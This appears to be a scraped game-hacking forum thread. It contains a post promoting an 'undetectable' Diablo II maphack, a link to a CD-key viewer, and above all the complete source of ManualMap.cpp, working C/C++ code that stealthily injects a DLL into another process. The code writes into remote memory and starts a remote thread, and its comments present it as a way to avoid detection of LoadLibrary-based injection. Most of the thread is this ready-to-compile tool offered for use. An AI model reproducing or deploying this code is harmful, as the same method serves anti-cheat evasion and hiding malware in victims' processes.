unsigned long GetProcessIdFromProcname(char *procName)
{
   PROCESSENTRY32 pe;
   HANDLE thSnapshot;
   BOOL retval, ProcFound = false;

   thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

   if(thSnapshot == INVALID_HANDLE_VALUE)
   {
      MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL);
      return false;
   }

   pe.dwSize = sizeof(PROCESSENTRY32);

    retval = Process32First(thSnapshot, &pe);

   while(retval)
   {
      if(StrStrI(pe.szExeFile, procName) )
      {
         ProcFound = true;
         break;
      }

      retval    = Process32Next(thSnapshot,&pe);
      pe.dwSize = sizeof(PROCESSENTRY32);
   }

   return pe.th32ProcessID;
}

HMODULE GetRemoteModuleHandle(unsigned long pId, char *module)
{
	MODULEENTRY32 modEntry;
	HANDLE tlh = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pId);

	modEntry.dwSize = sizeof(MODULEENTRY32);
    Module32First(tlh, &modEntry);

	do
	{
		if(!stricmp(modEntry.szModule, module))
			return modEntry.hModule;
		modEntry.dwSize = sizeof(MODULEENTRY32);
	}
	while(Module32Next(tlh, &modEntry));

	return NULL;
}

 

[_Ace]

EasyMap v3.0b by Netter - UNDETECTABLE​

Hello everyone =],

Please take time to read this disclaimer before continueing:

DISCLAIMER: I am not going to guarantee that you won't be banned. Use this maphack at your own risk. You may not use this software on battle.net, as it is breaking the battle.net user-license (EULA). I spent more time writing the new anti-detection code than writing the maphack itself, so you should be safe, but don't blame me if things go wrong.


Here are the main changes for the new version:

v3.0b (14/08/2005)

-Re-wrote anti-detection (easymap SHOULD be undetectable now)
-Removed monsterhack


This version is a beta-version. EasyMap is still only compatible on Windows2k/XP/NT. EasyMap has only been tested on WindowsXP SP2!

Download main: http://www.gamemunchers.net/EasyMap_v30.zip

I am not going to post this thread on any other forum, but you may mirror my post, aslong as it stays un-changed.

Have fun & hopefully safe gameplay! =]

-Jan

 

[_Ace]

ManualMap.cpp by Darawk

ManualMap.cpp by Darawk - Antidetection even in injection​

//         ManualMap - by Darawk - RealmGX.com
//
//   The purpose of ManualMap is to "manually map" a dll
//   module into a remote process's address space.  This
//   means that instead of just manipulating the remote
//   process into calling the LoadLibrary function, we
//   have our own emulation of what LoadLibrary does
//   without all those annoying detectability issues ^^.
//   The advantage of this method over using something
//   like my CloakDll function, is that this method never
//   has to call a function like LoadLibrary inside the
//   remote process.  Since LoadLibrary can be hooked,
//   the dll   could still be caught at the injection stage.
//   Or possibly also through the weakness I discussed in
//   the comment header of that file, which is not present
//   when using this technique.
#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>

#pragma comment(lib, "shlwapi.lib")

#define IMAGE_DIRECTORY_ENTRY_IMPORT 1
#define IMAGE_DIRECTORY_ENTRY_BASERELOC 5

//   Pietrek's macro
//
//   MakePtr is a macro that allows you to easily add to values (including
//   pointers) together without dealing with C's pointer arithmetic.  It
//   essentially treats the last two parameters as DWORDs.  The first
//   parameter is used to typecast the result to the appropriate pointer type.
#define MakePtr( cast, ptr, addValue ) (cast)( (DWORD_PTR)(ptr) + (DWORD_PTR)(addValue))

//   This one is mine, but obviously..."adapted" from matt's original idea =p
#define MakeDelta(cast, x, y) (cast) ( (DWORD_PTR)(x) - (DWORD_PTR)(y))

bool MapRemoteModule(unsigned long, char *);

unsigned long GetProcessIdByName(char *);
HMODULE GetRemoteModuleHandle(unsigned long, char *);
FARPROC GetRemoteProcAddress(unsigned long, char *, char *);

bool FixImports(unsigned long, void *, IMAGE_NT_HEADERS *, IMAGE_IMPORT_DESCRIPTOR *);
bool FixRelocs(void *, void *, IMAGE_NT_HEADERS *, IMAGE_BASE_RELOCATION *, unsigned int);
bool MapSections(HANDLE, void *, void *, IMAGE_NT_HEADERS *);

PIMAGE_SECTION_HEADER GetEnclosingSectionHeader(DWORD, PIMAGE_NT_HEADERS);
LPVOID GetPtrFromRVA(DWORD, PIMAGE_NT_HEADERS, PBYTE);

//   Stub that calls the Dll from within the remote process.
//   This is necessary because a DllMain function takes 3
//   arguments, and CreateRemoteThread can pass only 1.
__declspec(naked) void DllCall_stub(HMODULE hMod)
{
   _asm
   {
      push 0
      push 1
      push [esp+0Ch]      //   Pointer to the hMod argument
        mov eax, 0xDEADBEEF   //   Patch this in with the real value at run-time

      call eax         //   MSVC++ doesn't like direct absolute calls, so we have to be
                     //   clever about it.

      ret               //   Don't have to clean up the stack because the calling function
                     //   is just going to call ExitThread() immediately after this
                     //   function returns.
   }
}

//   Marker for the end of the DllCall_stub function
__declspec(naked) void DC_stubend(void) { }   

int main(int argc, char **argv)
{
   //   Just my test values...Cmdline.dll is a plugin that comes with
   //   Olly Debug 1.10
   MapRemoteModule(GetProcessIdByName("notepad.exe"), "Cmdline.dll");
   return 0;
}

bool MapRemoteModule(unsigned long pId, char *module)
{
   IMAGE_DOS_HEADER *dosHd;
   IMAGE_NT_HEADERS *ntHd;

   HANDLE hFile = CreateFile(module,
      GENERIC_READ,
      FILE_SHARE_READ | FILE_SHARE_WRITE,
      NULL,
      OPEN_EXISTING,
      FILE_ATTRIBUTE_NORMAL,
      NULL);

   if(hFile == INVALID_HANDLE_VALUE)
      return false;

   unsigned int fSize;

   if(GetFileAttributes(module) & FILE_ATTRIBUTE_COMPRESSED)
      fSize = GetCompressedFileSize(module, NULL);
   else
      fSize = GetFileSize(hFile, NULL);

   unsigned char *dllBin = new unsigned char[fSize];
   unsigned int nBytes;

   ReadFile(hFile, dllBin, fSize, (LPDWORD)&nBytes, FALSE);
   CloseHandle(hFile);

   //   Every PE file contains a little DOS stub for backwards compatibility
   //   it's only real relevance is that it contains a pointer to the actual
   //   PE header.
   dosHd = MakePtr(IMAGE_DOS_HEADER *, dllBin, 0);

   //   Make sure we got a valid DOS header
   if(dosHd->e_magic != IMAGE_DOS_SIGNATURE)
   {
      delete dllBin;
      return false;
   }

   //   Get the real PE header from the DOS stub header
   ntHd = MakePtr(IMAGE_NT_HEADERS *, dllBin, dosHd->e_lfanew);

   //   Verify the PE header
   if(ntHd->Signature != IMAGE_NT_SIGNATURE)
   {
      delete dllBin;
      return false;
   }

   HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pId);

   if(!hProcess)
      return false;

   //   Allocate space for the module in the remote process
   void *moduleBase = VirtualAllocEx(hProcess,
      NULL,
      ntHd->OptionalHeader.SizeOfImage,
      MEM_COMMIT | MEM_RESERVE,
      PAGE_EXECUTE_READWRITE);

   //   Make sure we got the memory space we wanted
   if(!moduleBase)
      return false;

   //   Allocate space for our stub
   void *stubBase = VirtualAllocEx(hProcess,
      NULL,
      MakeDelta(SIZE_T, DC_stubend, DllCall_stub),
      MEM_COMMIT | MEM_RESERVE,
      PAGE_EXECUTE_READWRITE);

   //   Make sure we got the memory space we wanted
   if(!stubBase)
      return false;

   //   Fix up the import table of the new module
   IMAGE_IMPORT_DESCRIPTOR *impDesc = (IMAGE_IMPORT_DESCRIPTOR *)GetPtrFromRVA(
      (DWORD)(ntHd->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress),
      ntHd,
      (PBYTE)dllBin);

   if(ntHd->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size)
      FixImports(pId,
         (unsigned char *)dllBin,
         ntHd,
         impDesc);
   
   //   Fix "base relocations" of the new module.  Base relocations are places
   //   in the module that use absolute addresses to reference data.  Since
   //   the base address of the module can be different at different times,
   //   the base relocation data is necessary to make the module loadable
   //   at any address.
   IMAGE_BASE_RELOCATION *reloc = (IMAGE_BASE_RELOCATION *)GetPtrFromRVA(
      (DWORD)(ntHd->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress),
      ntHd,
      (PBYTE)dllBin);

   if(ntHd->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size)
      FixRelocs(dllBin,
         moduleBase,
         ntHd,
         reloc,
         ntHd->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size);

   //   Write the PE header into the remote process's memory space
   WriteProcessMemory(hProcess,
      moduleBase,
      dllBin,
      ntHd->FileHeader.SizeOfOptionalHeader + sizeof(ntHd->FileHeader) + sizeof(ntHd->Signature),
      (SIZE_T *)&nBytes);

   //   Map the sections into the remote process(they need to be aligned
   //   along their virtual addresses)
   MapSections(hProcess, moduleBase, dllBin, ntHd);
   
   //   Change the page protection on the DllCall_stub function from PAGE_EXECUTE_READ
   //   to PAGE_EXECUTE_READWRITE, so we can patch it.
   VirtualProtect((LPVOID)DllCall_stub,
      MakeDelta(SIZE_T, DC_stubend, DllCall_stub),
      PAGE_EXECUTE_READWRITE,
      (DWORD *)&nBytes);

   //   Patch the stub so it calls the correct address
   *MakePtr(unsigned long *, DllCall_stub, 9) =
      MakePtr(unsigned long, moduleBase, ntHd->OptionalHeader.AddressOfEntryPoint);


   //   Write the stub into the remote process
   WriteProcessMemory(hProcess,
      stubBase,
      (LPVOID)DllCall_stub,
      MakeDelta(SIZE_T, DC_stubend, DllCall_stub),
      (SIZE_T *)&nBytes);

   //   Execute our stub in the remote process
   CreateRemoteThread(hProcess,
      NULL,
      0,
      (LPTHREAD_START_ROUTINE)stubBase,
      moduleBase,      //   Pass the base address of the module as the argument to the stub.
                  //   All a module handle is, is the base address of the module(except
                  //   in windows CE), so we're really passing a handle to the module
                  //   so that it can refer to itself, create dialogs, etc..
      0,
      NULL);

   delete dllBin;
   return true;
}

bool MapSections(HANDLE hProcess, void *moduleBase, void *dllBin, IMAGE_NT_HEADERS *ntHd)
{
   IMAGE_SECTION_HEADER *header = IMAGE_FIRST_SECTION(ntHd);
   unsigned int nBytes = 0;
   unsigned int virtualSize = 0;
   unsigned int n = 0;

   //   Loop through the list of sections
   for(unsigned int i = 0; ntHd->FileHeader.NumberOfSections; i++)
   {
      //   Once we've reached the SizeOfImage, the rest of the sections
      //   don't need to be mapped, if there are any.
      if(nBytes >= ntHd->OptionalHeader.SizeOfImage)
         break;
      
      WriteProcessMemory(hProcess,
         MakePtr(LPVOID, moduleBase, header->VirtualAddress),
         MakePtr(LPCVOID, dllBin, header->PointerToRawData),
         header->SizeOfRawData,
         (LPDWORD)&n);

      virtualSize = header->VirtualAddress;
      header++;
      virtualSize = header->VirtualAddress - virtualSize;
      nBytes += virtualSize;

      //   Set the proper page protections for this section.
      //   This really could be skipped, but it's not that
      //   hard to implement and it makes it more like a
      //   real loader.
      VirtualProtectEx(hProcess,
         MakePtr(LPVOID, moduleBase, header->VirtualAddress),
         virtualSize,
         header->Characteristics & 0x00FFFFFF,
         NULL);
   }

   return true;
}

bool FixImports(unsigned long pId, void *base, IMAGE_NT_HEADERS *ntHd, IMAGE_IMPORT_DESCRIPTOR *impDesc)
{
   char *module;

   //   Loop through all the required modules
   while((module = (char *)GetPtrFromRVA((DWORD)(impDesc->Name), ntHd, (PBYTE)base)))
   {
      //   If the library is already loaded(like kernel32.dll or ntdll.dll) LoadLibrary will
      //   just return the handle to that module.
        HMODULE localMod = LoadLibrary(module);

      //   If the module isn't loaded in the remote process, we recursively call the
      //   module mapping code.  This has the added benefit of ensuring that any of
      //   the current modules dependencies will be just as invisble as this one.
      if(!GetRemoteModuleHandle(pId, module))
         MapRemoteModule(pId, module);
       
      //   Lookup the first import thunk for this module
      //   NOTE: It is possible this module could forward functions...which is something
      //   that I really should handle.  Maybe i'll add support for forwared functions
      //   a little bit later.
      IMAGE_THUNK_DATA *itd =
         (IMAGE_THUNK_DATA *)GetPtrFromRVA((DWORD)(impDesc->FirstThunk), ntHd, (PBYTE)base);

      while(itd->u1.AddressOfData)
      {
         IMAGE_IMPORT_BY_NAME *iibn;
         iibn = (IMAGE_IMPORT_BY_NAME *)GetPtrFromRVA((DWORD)(itd->u1.AddressOfData), ntHd, (PBYTE)base);

             itd->u1.Function = MakePtr(DWORD, GetRemoteProcAddress(pId,
            module,
            (char *)iibn->Name), 0);

         itd++;
      }       
      impDesc++;
   }
   
   return true;
}

bool FixRelocs(void *base, void *rBase, IMAGE_NT_HEADERS *ntHd, IMAGE_BASE_RELOCATION *reloc, unsigned int size)
{
   unsigned long ImageBase = ntHd->OptionalHeader.ImageBase;
   unsigned int nBytes = 0;

   unsigned long delta = MakeDelta(unsigned long, rBase, ImageBase);

   while(1)
   {
      unsigned long *locBase =
         (unsigned long *)GetPtrFromRVA((DWORD)(reloc->VirtualAddress), ntHd, (PBYTE)base);
      unsigned int numRelocs = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);

      if(nBytes >= size) break;

      unsigned short *locData = MakePtr(unsigned short *, reloc, sizeof(IMAGE_BASE_RELOCATION));
      for(unsigned int i = 0; i < numRelocs; i++)
      {       
         if(((*locData >> 12) & IMAGE_REL_BASED_HIGHLOW))
             *MakePtr(unsigned long *, locBase, (*locData & 0x0FFF)) += delta;

         locData++;
      }

      nBytes += reloc->SizeOfBlock;
      reloc = (IMAGE_BASE_RELOCATION *)locData;
   }

   return true;
}


FARPROC GetRemoteProcAddress(unsigned long pId, char *module, char *func)
{
   HMODULE remoteMod = GetRemoteModuleHandle(pId, module);
   HMODULE localMod = GetModuleHandle(module);

   //   Account for potential differences in base address
   //   of modules in different processes.
   unsigned long delta = MakeDelta(unsigned long, remoteMod, localMod);
   return MakePtr(FARPROC, GetProcAddress(localMod, func), delta);
}

unsigned long GetProcessIdByName(char *process)
{
   PROCESSENTRY32 pe;
   HANDLE thSnapshot;
   BOOL retval, ProcFound = false;

   thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

   if(thSnapshot == INVALID_HANDLE_VALUE)
   {
      MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL);
      return false;
   }

   pe.dwSize = sizeof(PROCESSENTRY32);

    retval = Process32First(thSnapshot, &pe);

   while(retval)
   {
      if(StrStrI(pe.szExeFile, process) )
      {
         ProcFound = true;
         break;
      }

      retval    = Process32Next(thSnapshot,&pe);
      pe.dwSize = sizeof(PROCESSENTRY32);
   }

   return pe.th32ProcessID;
}

HMODULE GetRemoteModuleHandle(unsigned long pId, char *module)
{
   MODULEENTRY32 modEntry;
   HANDLE tlh = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pId);

   modEntry.dwSize = sizeof(MODULEENTRY32);
    Module32First(tlh, &modEntry);

   do
   {
      if(!stricmp(modEntry.szModule, module))
         return modEntry.hModule;
      modEntry.dwSize = sizeof(MODULEENTRY32);
   }
   while(Module32Next(tlh, &modEntry));

   return NULL;
}

//   Matt Pietrek's function
PIMAGE_SECTION_HEADER GetEnclosingSectionHeader(DWORD rva, PIMAGE_NT_HEADERS pNTHeader)
{
    PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(pNTHeader);
    unsigned int i;
   
    for ( i = 0; i < pNTHeader->FileHeader.NumberOfSections; i++, section++ )
    {
      // This 3 line idiocy is because Watcom's linker actually sets the
      // Misc.VirtualSize field to 0.  (!!! - Retards....!!!)
      DWORD size = section->Misc.VirtualSize;
      if ( 0 == size )
         size = section->SizeOfRawData;
         
        // Is the RVA within this section?
        if ( (rva >= section->VirtualAddress) &&
             (rva < (section->VirtualAddress + size)))
            return section;
    }
   
    return 0;
}

//   This function is also Pietrek's
LPVOID GetPtrFromRVA( DWORD rva, IMAGE_NT_HEADERS *pNTHeader, PBYTE imageBase )
{
   PIMAGE_SECTION_HEADER pSectionHdr;
   INT delta;
      
   pSectionHdr = GetEnclosingSectionHeader( rva, pNTHeader );
   if ( !pSectionHdr )
      return 0;
 
   delta = (INT)(pSectionHdr->VirtualAddress-pSectionHdr->PointerToRawData);
   return (PVOID) ( imageBase + rva - delta );
}

 

[_CM]

R1CH's ShowCDkey Utility​

Yet another CD key viewer... this time in GUI form. Requires the .NET framework because .NET is awesome - if you don't have it already, get it from here.

Download:
http://r-1.ch/ViewD2Keys.NET.zip (23 KiB)

Screenshot:

 

[LordNevar]

All information is still valid, and all links work to the correct files.